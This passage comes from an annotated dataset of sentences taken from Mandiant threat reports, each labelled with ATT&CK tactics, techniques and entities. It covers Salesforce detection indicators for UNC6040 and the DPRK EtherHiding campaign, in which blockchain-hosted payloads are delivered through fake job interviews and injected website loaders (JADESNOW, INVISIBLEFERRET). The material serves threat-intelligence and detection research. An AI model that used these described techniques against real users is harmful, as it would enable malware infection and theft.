"mandiant-31_mandiant_report-p1-s163-622f65", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 163, "context_before": "High-fidelity when conditioned on source or destination IP address matches a known UNC6040 IOC.", "sentence_text": "($e.principal.ip in %unc6040_IoC_list) or ($e.target.ip in %unc6040_IoC_list)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s164-1e69bc", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 164, "context_before": "($e.principal.ip in %unc6040_IoC_list) or ($e.target.ip in %unc6040_IoC_list)", "sentence_text": "Acknowledgements\nWe would like to thank Salesforce for their collaboration and assistance in building this guide.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s165-802ccd", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 165, "context_before": "Acknowledgements\nWe would like to thank Salesforce for their collaboration and assistance in building this guide.", "sentence_text": "Posted in\nThreat Intelligence\nRelated articles\nThreat Intelligence\nKeys to the Kingdom: A Defender's Guide to Privileged Account Monitoring By Mandiant • 39-minute read Threat Intelligence Help Wanted: Vietnamese Actors Using Fake Job", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s166-92bb25", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 166, "context_before": "Posted in\nThreat Intelligence\nRelated articles\nThreat Intelligence\nKeys to the Kingdom: A Defender's Guide to Privileged Account Monitoring By Mandiant • 39-minute read Threat Intelligence Help Wanted: Vietnamese Actors Using Fake Job", "sentence_text": "Posting Campaigns to Deliver Malware and Steal Credentials By Google Threat Intelligence Group • 6-minute read Threat Intelligence Pro-Russia Information Operations Leverage Russian Drone Incursions into Polish Airspace By Google Threat Intelligence Group • 7-minute read Threat Intelligence To Be (A Robot) or Not to Be: New Malware Attributed to Russia State-Sponsored COLDRIVER By Google Threat Intelligence Group • 12-minute read [FILTERED_TABLES_START]\nData Exfiltration (via API, Data Loader, reports) | High-rate Query/QueryMore/QueryAll bursts.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s167-e60a01", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 167, "context_before": "Posting Campaigns to Deliver Malware and Steal Credentials By Google Threat Intelligence Group • 6-minute read Threat Intelligence Pro-Russia Information Operations Leverage Russian Drone Incursions into Polish Airspace By Google Threat Intelligence Group • 7-minute read Threat Intelligence To Be (A Robot) or Not to Be: New Malware Attributed to Russia State-Sponsored COLDRIVER By Google Threat Intelligence Group • 12-minute read [FILTERED_TABLES_START]\nData Exfiltration (via API, Data Loader, reports) | High-rate Query/QueryMore/QueryAll bursts.", "sentence_text": "Large RowsProcessed/RecordCount in reports & list views (chunked).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s168-8bb2dc", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 168, "context_before": "Large RowsProcessed/RecordCount in reports & list views (chunked).", "sentence_text": "Bulk job result downloads.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s169-acde25", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 169, "context_before": "Bulk job result downloads.", "sentence_text": "File/attachment downloads at scale | ApiEventStream/ApiEvent ReportEventStream/ReportEvent ListViewEventStream/ListViewEvent BulkApiResultEvent FileEvent/FileEventStore ApiAnomalyEvent/ReportAnomalyEvent", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s170-b5d0e0", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 170, "context_before": "File/attachment downloads at scale | ApiEventStream/ApiEvent ReportEventStream/ReportEvent ListViewEventStream/ListViewEvent BulkApiResultEvent FileEvent/FileEventStore ApiAnomalyEvent/ReportAnomalyEvent", "sentence_text": "Unique Query Event Type Lateral Movement/Persistence (within Salesforce or to other cloud platforms) | Permissions elevated (e.g., View/Modify All Data, API Enabled).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s171-7a544b", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 171, "context_before": "Unique Query Event Type Lateral Movement/Persistence (within Salesforce or to other cloud platforms) | Permissions elevated (e.g., View/Modify All Data, API Enabled).", "sentence_text": "New user/service accounts.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s173-be425e", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 173, "context_before": "LoginAs activity.", "sentence_text": "Logins from VPN/Tor after SF OAuth.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s174-6c344d", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 174, "context_before": "Logins from VPN/Tor after SF OAuth.", "sentence_text": "Pivots to Okta/M365, then Graph data pulls.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-31_mandiant_report-p1-s175-9e2c8e", "source": "mandiant", "doc_id": "31_mandiant_report", "page_number": 1, "sentence_id": 175, "context_before": "Pivots to Okta/M365, then Graph data pulls.", "sentence_text": "| Setup Audit Trail PermissionSetEvent LoginAsEventStream", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p1-s1-98c8c3", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 1, "sentence_id": 1, "context_before": "[START]", "sentence_text": "This post is part of a two-part blog series on adversaries using EtherHiding, a technique that leverages transactions on public blockchains to store and retrieve malicious payloads— notable for its resilience against conventional takedown and blocklisting efforts.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p1-s2-01b1dc", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 1, "sentence_id": 2, "context_before": "This post is part of a two-part blog series on adversaries using EtherHiding, a technique that leverages transactions on public blockchains to store and retrieve malicious payloads— notable for its resilience against conventional takedown and blocklisting efforts.", "sentence_text": "Read about UNC5142 campaign leveraging EtherHiding to distribute malware.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p2-s3-4506b6", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 2, "sentence_id": 3, "context_before": "Read about UNC5142 campaign leveraging EtherHiding to distribute malware.", "sentence_text": "This approach essentially turns the blockchain into a decentralized and highly resilient command-and-control (C2) server.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p2-s4-965954", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 2, "sentence_id": 4, "context_before": "This approach essentially turns the blockchain into a decentralized and highly resilient command-and-control (C2) server.", "sentence_text": "The typical attack chain unfolds as follows:\n1.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p2-s5-403b26", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 2, "sentence_id": 5, "context_before": "The typical attack chain unfolds as follows:\n1.", "sentence_text": "Injection of a Loader Script: The attacker injects a small piece of JavaScript code, often referred to as a \"loader,\" into the compromised website.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1059.007", "name": "JavaScript" }, { "id": "T1505", "name": "Server Software Component" } ], "procedure": "Inject a JavaScript loader script into a compromised website.", "entities": [ { "text": "The attacker", "start": 30, "end": 42, "label": "ThreatActor" }, { "text": "injects a small piece of JavaScript code, often referred to as a \"loader,\" into the compromised website", "start": 43, "end": 146, "label": "Action" }, { "text": "compromised website", "start": 127, "end": 146, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-32_mandiant_report-p2-s6-62d51c", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 2, "sentence_id": 6, "context_before": "Injection of a Loader Script: The attacker injects a small piece of JavaScript code, often referred to as a \"loader,\" into the compromised website.", "sentence_text": "Fetching the Malicious Payload: When a user visits the compromised website, the loader script executes in their browser.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.007", "name": "JavaScript" } ], "procedure": "Execute the loader script in the user's browser when visiting the compromised website.", "entities": [ { "text": "loader script executes in their browser", "start": 80, "end": 119, "label": "Action" }, { "text": "compromised website", "start": 55, "end": 74, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-32_mandiant_report-p2-s7-4e02c0", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 2, "sentence_id": 7, "context_before": "Fetching the Malicious Payload: When a user visits the compromised website, the loader script executes in their browser.", "sentence_text": "This script then communicates with the blockchain to retrieve the main malicious payload stored in a remote server.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" }, { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "Communicate with the blockchain to retrieve the main malicious payload from a remote server.", "entities": [ { "text": "communicates with the blockchain to retrieve the main malicious payload stored in a remote server", "start": 17, "end": 114, "label": "Action" } ] }, { "uid": "mandiant-32_mandiant_report-p2-s8-bad214", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 2, "sentence_id": 8, "context_before": "This script then communicates with the blockchain to retrieve the main malicious payload stored in a remote server.", "sentence_text": "A key aspect of this step is the use of a read-only function call (such as eth_call ), which does not create a transaction on the blockchain.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p2-s9-79ef56", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 2, "sentence_id": 9, "context_before": "A key aspect of this step is the use of a read-only function call (such as eth_call ), which does not create a transaction on the blockchain.", "sentence_text": "This ensures the retrieval of the malware is stealthy and avoids transaction fees (i.e. gas fees).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p3-s10-51fe6c", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 3, "sentence_id": 10, "context_before": "This ensures the retrieval of the malware is stealthy and avoids transaction fees (i.e. gas fees).", "sentence_text": "Payload Execution: Once fetched, the malicious Cloud Blog Contact sales Get started for free payload is executed on the victim's computer.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1204", "name": "User Execution" } ], "procedure": "Execute the malicious payload on the victim's computer after it is fetched.", "entities": [ { "text": "is executed on the victim's computer", "start": 101, "end": 137, "label": "Action" } ] }, { "uid": "mandiant-32_mandiant_report-p3-s11-6647ec", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 3, "sentence_id": 11, "context_before": "Payload Execution: Once fetched, the malicious Cloud Blog Contact sales Get started for free payload is executed on the victim's computer.", "sentence_text": "The malicious code remains accessible as long as the blockchain itself is operational.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p3-s12-bea451", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 3, "sentence_id": 12, "context_before": "The malicious code remains accessible as long as the blockchain itself is operational.", "sentence_text": "Anonymity: The pseudonymous nature of blockchain transactions makes it difficult to trace the identity of the attackers who deployed the smart contract.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p3-s13-686696", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 3, "sentence_id": 13, "context_before": "Anonymity: The pseudonymous nature of blockchain transactions makes it difficult to trace the identity of the attackers who deployed the smart contract.", "sentence_text": "Immutability: Once a smart contract is deployed, the malicious code within it typically cannot be easily removed or altered by anyone other than the contract owner.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p3-s15-44076f", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 3, "sentence_id": 15, "context_before": "Stealth:", "sentence_text": "Attackers can retrieve the malicious payload using read-only calls that do not leave a visible transaction history on the blockchain, making their activities harder to track.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1102", "name": "Web Service" } ], "procedure": "Retrieve the malicious payload using read-only blockchain calls that do not leave a visible transaction history.", "entities": [ { "text": "Attackers", "start": 0, "end": 9, "label": "ThreatActor" }, { "text": "retrieve the malicious payload using read-only calls that do not leave a visible transaction history on the blockchain", "start": 14, "end": 132, "label": "Action" }, { "text": "blockchain", "start": 122, "end": 132, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-32_mandiant_report-p3-s16-413347", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 3, "sentence_id": 16, "context_before": "Attackers can retrieve the malicious payload using read-only calls that do not leave a visible transaction history on the blockchain, making their activities harder to track.", "sentence_text": "Flexibility: The attacker who controls the smart contract can update the malicious payload at any time.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p3-s17-14e2a6", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 3, "sentence_id": 17, "context_before": "Flexibility: The attacker who controls the smart contract can update the malicious payload at any time.", "sentence_text": "This allows them to change their attack methods, update domains, or deploy different types of malware to compromised websites simultaneously by simply updating the smart contract.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1608", "name": "Stage Capabilities" }, { "id": "T1584", "name": "Compromise Infrastructure" } ], "procedure": "Change attack methods, update domains, and deploy different malware to compromised websites by updating the smart contract.", "entities": [ { "text": "change their attack methods, update domains, or deploy different types of malware to compromised websites simultaneously", "start": 20, "end": 140, "label": "Action" }, { "text": "domains", "start": 56, "end": 63, "label": "Infrastructure_Indicator" }, { "text": "compromised websites", "start": 105, "end": 125, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-32_mandiant_report-p4-s18-f632f4", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 4, "sentence_id": 18, "context_before": "This allows them to change their attack methods, update domains, or deploy different types of malware to compromised websites simultaneously by simply updating the smart contract.", "sentence_text": "This technique underscores the continuous evolution of cyber threats as attackers adapt and leverage new technologies to their advantage.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p4-s19-4b0ae3", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 4, "sentence_id": 19, "context_before": "This technique underscores the continuous evolution of cyber threats as attackers adapt and leverage new technologies to their advantage.", "sentence_text": "DPRK Social Engineering Campaign North Korea's social engineering campaign is a sophisticated and ongoing cyber espionage and financially motivated operation that cleverly exploits the job application and interview process.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p4-s20-30bd31", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 4, "sentence_id": 20, "context_before": "DPRK Social Engineering Campaign North Korea's social engineering campaign is a sophisticated and ongoing cyber espionage and financially motivated operation that cleverly exploits the job application and interview process.", "sentence_text": "The campaign has a dual purpose that aligns with North Korea's strategic goals:\nFinancial Gain: A primary objective is the theft of cryptocurrency and other financial assets to generate revenue for the regime, helping it bypass international sanctions.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p4-s21-72a062", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 4, "sentence_id": 21, "context_before": "The campaign has a dual purpose that aligns with North Korea's strategic goals:\nFinancial Gain: A primary objective is the theft of cryptocurrency and other financial assets to generate revenue for the regime, helping it bypass international sanctions.", "sentence_text": "Espionage: By compromising developers, the campaign aims to gather valuable intelligence and potentially gain a foothold in technology companies for future operations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p4-s22-6b37c3", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 4, "sentence_id": 22, "context_before": "Espionage: By compromising developers, the campaign aims to gather valuable intelligence and potentially gain a foothold in technology companies for future operations.", "sentence_text": "The campaign is characterized by its elaborate social engineering tactics that mimic legitimate recruitment processes.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p5-s24-ecaca4", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 5, "sentence_id": 24, "context_before": "The Phishing Lure:", "sentence_text": "11/6/25, 8:21 PM DPRK Adopts EtherHiding: Nation-State Malware Hiding on Blockchains | Google Cloud Blog Fake Recruiters and Companies: The threat actors Cloud Blog Contact sales Get started for free create convincing but fraudulent profiles on professional networking sites like LinkedIn and job boards.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p5-s25-da84c7", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 5, "sentence_id": 25, "context_before": "11/6/25, 8:21 PM DPRK Adopts EtherHiding: Nation-State Malware Hiding on Blockchains | Google Cloud Blog Fake Recruiters and Companies: The threat actors Cloud Blog Contact sales Get started for free create convincing but fraudulent profiles on professional networking sites like LinkedIn and job boards.", "sentence_text": "They often impersonate recruiters from well- known tech or cryptocurrency firms.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p5-s26-f3bda8", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 5, "sentence_id": 26, "context_before": "They often impersonate recruiters from well- known tech or cryptocurrency firms.", "sentence_text": "The Interview Process:\nInitial Engagement: The fake recruiters engage with candidates, often moving the conversation to platforms like Telegram or Discord.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "Engage with candidates and move the conversation to external platforms such as Telegram or Discord.", "entities": [ { "text": "engage with candidates, often moving the conversation to platforms like Telegram or Discord", "start": 63, "end": 154, "label": "Action" }, { "text": "Telegram", "start": 135, "end": 143, "label": "Infrastructure_Indicator" }, { "text": "Discord", "start": 147, "end": 154, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-32_mandiant_report-p5-s27-e4131d", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 5, "sentence_id": 27, "context_before": "The Interview Process:\nInitial Engagement: The fake recruiters engage with candidates, often moving the conversation to platforms like Telegram or Discord.", "sentence_text": "The Malicious Task: The core of the attack occurs during a technical assessment phase.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p5-s28-cb1a74", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 5, "sentence_id": 28, "context_before": "The Malicious Task: The core of the attack occurs during a technical assessment phase.", "sentence_text": "Candidates are asked to perform a coding test or review a project, which requires them to download files from repositories like GitHub.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p5-s29-7cd539", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 5, "sentence_id": 29, "context_before": "Candidates are asked to perform a coding test or review a project, which requires them to download files from repositories like GitHub.", "sentence_text": "These files contain malicious code.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p6-s32-9f5c6e", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 6, "sentence_id": 32, "context_before": "Google Cloud Blog", "sentence_text": "Initial Downloader (e.g., JADESNOW): The malicious packages downloaded by the victim are often hosted on the npm (Node Package Manager) registry.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p6-s33-323a8b", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 6, "sentence_id": 33, "context_before": "Initial Downloader (e.g., JADESNOW): The malicious packages downloaded by the victim are often hosted on the npm (Node Package Manager) registry.", "sentence_text": "These loaders may collect initial system information and download the next stage of malware.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1082", "name": "System Information Discovery" }, { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Collect initial system information and download the next stage of malware.", "entities": [ { "text": "collect initial system information and download the next stage of malware", "start": 18, "end": 91, "label": "Action" } ] }, { "uid": "mandiant-32_mandiant_report-p6-s34-e14e68", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 6, "sentence_id": 34, "context_before": "These loaders may collect initial system information and download the next stage of malware.", "sentence_text": "The addition of JADESNOW to the attack chain marks UNC5342’s shift towards EtherHiding to serve up the third-stage backdoor INVISIBLEFERRET.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p6-s35-ea1334", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 6, "sentence_id": 35, "context_before": "The addition of JADESNOW to the attack chain marks UNC5342’s shift towards EtherHiding to serve up the third-stage backdoor INVISIBLEFERRET.", "sentence_text": "Third-Stage Backdoor (e.g., INVISIBLEFERRET): For high-value targets, a more persistent backdoor is deployed.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1547", "name": "Boot or Logon Autostart Execution" } ], "procedure": "Deploy a persistent backdoor on high-value targets.", "entities": [ { "text": "INVISIBLEFERRET", "start": 28, "end": 43, "label": "MalwareTool" }, { "text": "is deployed", "start": 97, "end": 108, "label": "Action" } ] }, { "uid": "mandiant-32_mandiant_report-p6-s36-38e4d2", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 6, "sentence_id": 36, "context_before": "Third-Stage Backdoor (e.g., INVISIBLEFERRET): For high-value targets, a more persistent backdoor is deployed.", "sentence_text": "INVISIBLEFERRET, a Python-based backdoor, provides the attackers remote control over the compromised system, allowing for long-term espionage, data theft, and lateral movement within a network.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" }, { "id": "TA0009", "name": "Collection" }, { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1219", "name": "Remote Access Tools" }, { "id": "T1005", "name": "Data from Local System" }, { "id": "T1021", "name": "Remote Services" } ], "procedure": "Provide remote control over the compromised system to enable espionage, data theft, and lateral movement.", "entities": [ { "text": "INVISIBLEFERRET", "start": 0, "end": 15, "label": "MalwareTool" }, { "text": "provides the attackers remote control over the compromised system", "start": 42, "end": 107, "label": "Action" }, { "text": "allowing for long-term espionage, data theft, and lateral movement within a network", "start": 109, "end": 192, "label": "Action" } ] }, { "uid": "mandiant-32_mandiant_report-p6-s37-78b37c", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 6, "sentence_id": 37, "context_before": "INVISIBLEFERRET, a Python-based backdoor, provides the attackers remote control over the compromised system, allowing for long-term espionage, data theft, and lateral movement within a network.", "sentence_text": "JADESNOW\nJADESNOW is a JavaScript-based downloader malware family associated with the threat cluster UNC5342.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p6-s38-af08d5", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 6, "sentence_id": 38, "context_before": "JADESNOW\nJADESNOW is a JavaScript-based downloader malware family associated with the threat cluster UNC5342.", "sentence_text": "The input data stored in the smart contract may be Base64-encoded and XOR- encrypted.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p6-s39-db9bcf", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 6, "sentence_id": 39, "context_before": "The input data stored in the smart contract may be Base64-encoded and XOR- encrypted.", "sentence_text": "The final payload in the JADESNOW infection chain is usually a more persistent backdoor like INVISIBLEFERRET.JAVASCRIPT.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p7-s41-40e365", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 7, "sentence_id": 41, "context_before": "Google Cloud Blog", "sentence_text": "The deployment and management of JADESNOW differs Cloud Blog Contact sales Get started for free from that of similar campaigns that implement EtherHiding, such as CLEARFAKE.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p7-s42-92c4c1", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 7, "sentence_id": 42, "context_before": "The deployment and management of JADESNOW differs Cloud Blog Contact sales Get started for free from that of similar campaigns that implement EtherHiding, such as CLEARFAKE.", "sentence_text": "The CLEARFAKE campaign, associated with the threat cluster UNC5142, functions as a malicious JavaScript framework and often masquerades as a Google Chrome browser update pop-up on compromised websites.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "Masquerade malicious content as a legitimate browser update pop-up on compromised websites.", "entities": [ { "text": "CLEARFAKE", "start": 4, "end": 13, "label": "MalwareTool" }, { "text": "masquerades as a Google Chrome browser update pop-up on compromised websites", "start": 124, "end": 200, "label": "Action" } ] }, { "uid": "mandiant-32_mandiant_report-p7-s43-bf4cf7", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 7, "sentence_id": 43, "context_before": "The CLEARFAKE campaign, associated with the threat cluster UNC5142, functions as a malicious JavaScript framework and often masquerades as a Google Chrome browser update pop-up on compromised websites.", "sentence_text": "The primary function of the embedded JavaScript is to download a payload after a user clicks the \"Update Chrome\" button.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p7-s44-816070", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 7, "sentence_id": 44, "context_before": "The primary function of the embedded JavaScript is to download a payload after a user clicks the \"Update Chrome\" button.", "sentence_text": "The second-stage payload is another Base64-encoded JavaScript stored on the BNB Smart Chain.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p7-s45-702135", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 7, "sentence_id": 45, "context_before": "The second-stage payload is another Base64-encoded JavaScript stored on the BNB Smart Chain.", "sentence_text": "The victim receives a malicious interview question, deceiving the victim into running code that executes the initial JavaScript downloader that interacts with a malicious smart contract and downloads the second-stage payload.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1566", "name": "Phishing" }, { "id": "T1204", "name": "User Execution" }, { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Deceive the victim into running code that executes a downloader which interacts with a malicious smart contract and downloads a second-stage payload.", "entities": [ { "text": "deceiving the victim into running code that executes the initial JavaScript downloader", "start": 52, "end": 138, "label": "Action" }, { "text": "interacts with a malicious smart contract and downloads the second-stage payload", "start": 144, "end": 224, "label": "Action" } ] }, { "uid": "mandiant-32_mandiant_report-p7-s46-8e021c", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 7, "sentence_id": 46, "context_before": "The victim receives a malicious interview question, deceiving the victim into running code that executes the initial JavaScript downloader that interacts with a malicious smart contract and downloads the second-stage payload.", "sentence_text": "The smart contract hosts the JADESNOW downloader that interacts with Ethereum to fetch the third-stage payload, in this case INVISIBLEFERRET.JAVASCRIPT.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p7-s47-b3e587", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 7, "sentence_id": 47, "context_before": "The smart contract hosts the JADESNOW downloader that interacts with Ethereum to fetch the third-stage payload, in this case INVISIBLEFERRET.JAVASCRIPT.", "sentence_text": "The payload is run in memory and may query Ethereum for an additional credential stealer component.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "The payload executes in memory and may retrieve an additional component from Ethereum.", "entities": [ { "text": "run in memory", "start": 15, "end": 28, "label": "Action" }, { "text": "query Ethereum for an additional credential stealer component", "start": 37, "end": 98, "label": "Action" }, { "text": "Ethereum", "start": 43, "end": 51, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-32_mandiant_report-p7-s48-531fb2", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 7, "sentence_id": 48, "context_before": "The payload is run in memory and may query Ethereum for an additional credential stealer component.", "sentence_text": "It is unusual to see a threat actor make use of multiple blockchains for EtherHiding activity; this may indicate operational compartmentalization between teams of North Korean cyber operators.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-32_mandiant_report-p7-s49-9b918b", "source": "mandiant", "doc_id": "32_mandiant_report", "page_number": 7, "sentence_id": 49, "context_before": "It is unusual to see a threat actor make use of multiple blockchains for EtherHiding activity; this may indicate operational compartmentalization between teams of North Korean cyber operators.", "sentence_text": "Lastly, campaigns frequently leverage EtherHiding's flexible nature to update the infection chain and shift payload delivery locations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { 